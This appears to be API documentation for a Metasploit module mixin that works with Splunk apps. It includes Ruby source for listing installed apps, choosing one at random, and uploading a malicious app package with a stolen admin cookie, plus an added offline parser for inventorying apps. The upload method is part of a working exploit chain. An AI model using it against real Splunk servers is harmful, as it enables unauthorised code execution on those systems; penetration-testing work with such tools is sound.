Module: Msf::Exploit::Remote::HTTP::Splunk::Apps
Included in: Msf::Exploit::Remote::HTTP::Splunk
Defined in: lib/msf/core/exploit/remote/http/splunk/apps.rb
Overview
This module provides a way of interacting with Splunk apps (listing installed apps and their enabled/disabled state, picking one at random, and uploading an app package).
Instance Method Summary
- #get_apps(cookie) ⇒ Hash
  Retrieves a list of installed Splunk apps along with their status.
- #get_random_app(cookie, filter = {}) ⇒ String?
  Selects a random Splunk app from the installed apps, optionally filtered by criteria.
- #splunk_upload_app(app_name, cookie) ⇒ Boolean
  Uploads a malicious app to Splunk using an admin cookie.
Instance Method Details
#get_apps(cookie) ⇒ Hash
Retrieves a list of installed Splunk apps along with their status. Returns a Hash of app name => { enabled: true/false }, walking the paginated apps table until no further page is available (or the 250-page limit is hit).

# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 55

def get_apps(cookie)
  apps = {}
  vars_get = {}
  max_pages = 250

  max_pages.times do |page_num|
    res = send_request_cgi(
      'uri' => splunk_apps_url,
      'method' => 'GET',
      'cookie' => cookie,
      'vars_get' => vars_get
    )

    unless res&.code == 200
      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} - Failed to retrieve apps (HTTP #{res&.code})")
    end

    html = res.get_html_document
    table = html.at('table.splTable')
    break unless table

    table.css('tr').each do |row|
      name_td = row.at('td.col-generic.col-2')
      status_td = row.at('td.col-status.col-7')
      next unless name_td && status_td

      # The status cell links to doObjectAction('disable', ...) for an enabled app
      # and doObjectAction('enable', ...) for a disabled one.
      status_link = status_td.at('a[onclick*="doObjectAction"]')
      action_type = status_link&.[]('onclick')&.slice(/doObjectAction\('(disable|enable)'/, 1)
      enabled = action_type != 'enable'

      name = name_td.text.strip
      apps[name] = { enabled: enabled }
    end

    # Follow the table's pagination until there is no next page.
    vars_get = extract_next_page_vars(html)
    break unless vars_get

    if page_num == max_pages - 1
      print_warning("Reached maximum page limit (#{max_pages}). Some apps might be missing.")
    end
  end

  apps
end
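The same enabled/disabled inference, as a stand-alone Ruby parser that an administrator could point at a saved copy of the Splunk "Manage Apps" page to inventory which apps are active. This is an added example, not the mixin's code: it uses REXML (bundled with Ruby) instead of Nokogiri, so the constructed sample page is written as well-formed markup, and the helper names are assumptions.

```ruby
require 'rexml/document'
require 'rexml/xpath'

# Constructed sample of one page of the Splunk apps table. The header row has
# no <td> cells, and the last data row carries no doObjectAction link at all.
SAMPLE_APPS_HTML = <<~HTML
  <html><body><table class="splTable">
    <tr><th class="col-generic col-2">Name</th><th class="col-status col-7">Status</th></tr>
    <tr>
      <td class="col-generic col-2">search</td>
      <td class="col-status col-7">Enabled | <a href="#" onclick="doObjectAction('disable','search')">Disable</a></td>
    </tr>
    <tr>
      <td class="col-generic col-2">old_dashboard</td>
      <td class="col-status col-7">Disabled | <a href="#" onclick="doObjectAction('enable','old_dashboard')">Enable</a></td>
    </tr>
    <tr>
      <td class="col-generic col-2">launcher</td>
      <td class="col-status col-7">Enabled</td>
    </tr>
  </table></body></html>
HTML

# First child <tag> of +node+ whose class attribute contains +klass+
# (REXML has no CSS selectors, so this stands in for Nokogiri's 'td.col-2').
def cell_with_class(node, tag, klass)
  REXML::XPath.first(node, "./#{tag}[contains(concat(' ', @class, ' '), ' #{klass} ')]")
end

# Parses the table into { name => { enabled: true/false } }: a
# doObjectAction('disable', ...) link means the app is enabled, an
# ('enable', ...) link means it is disabled, and a row with no such link
# is reported as enabled because nothing marks it disabled.
def parse_splunk_apps(html)
  table = REXML::XPath.first(REXML::Document.new(html), "//table[contains(@class,'splTable')]")
  return {} unless table

  apps = {}
  REXML::XPath.each(table, './/tr') do |row|
    name_td = cell_with_class(row, 'td', 'col-2')
    status_td = cell_with_class(row, 'td', 'col-7')
    next unless name_td && status_td

    link = REXML::XPath.first(status_td, ".//a[contains(@onclick,'doObjectAction')]")
    onclick = link ? link.attributes['onclick'].to_s : ''
    apps[name_td.text.strip] = { enabled: onclick[/doObjectAction\('(disable|enable)'/, 1] != 'enable' }
  end
  apps
end
```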
#get_random_app(cookie, filter = {}) ⇒ String?
Selects a random Splunk app from the installed apps, optionally filtered by criteria. Returns the app name, or nil when no app matches the filter.

# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 106

def get_random_app(cookie, filter = {})
  all_apps = get_apps(cookie)
  filtered_apps = filter_apps(all_apps, filter).keys
  filtered_apps.sample
end
#splunk_upload_app(app_name, cookie) ⇒ Boolean
Uploads a malicious app to Splunk using an admin cookie. Fetches the upload form first to collect its hidden fields (state and splunk_form_key), then posts them together with the app archive as multipart form data. Returns true on success, false otherwise.

# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 10

def splunk_upload_app(app_name, cookie)
  res = send_request_cgi({
    'uri' => splunk_upload_url,
    'method' => 'GET',
    'cookie' => cookie
  })

  unless res&.code == 200
    vprint_error('Unable to get form state')
    return false
  end

  html = res.get_html_document
  data = Rex::MIME::Message.new

  # fill the hidden fields from the form: state and splunk_form_key
  html.at('[id="installform"]').elements.each do |form|
    next unless form.attributes['value']

    data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")
  end

  data.add_part('1', nil, nil, 'form-data; name="force"')
  data.add_part(splunk_helper_malicious_app(app_name), 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")

  post_data = data.to_s

  res = send_request_cgi({
    'uri' => splunk_upload_url,
    'method' => 'POST',
    'cookie' => cookie,
    'ctype' => "multipart/form-data; boundary=#{data.bound}",
    'data' => post_data
  })

  # A redirect (303) or a 200 without the error banner means the upload was accepted.
  unless res&.code == 303 || (res&.code == 200 && res.body !~ /There was an error processing the upload/)
    vprint_error('Error uploading App')
    return false
  end

  true
end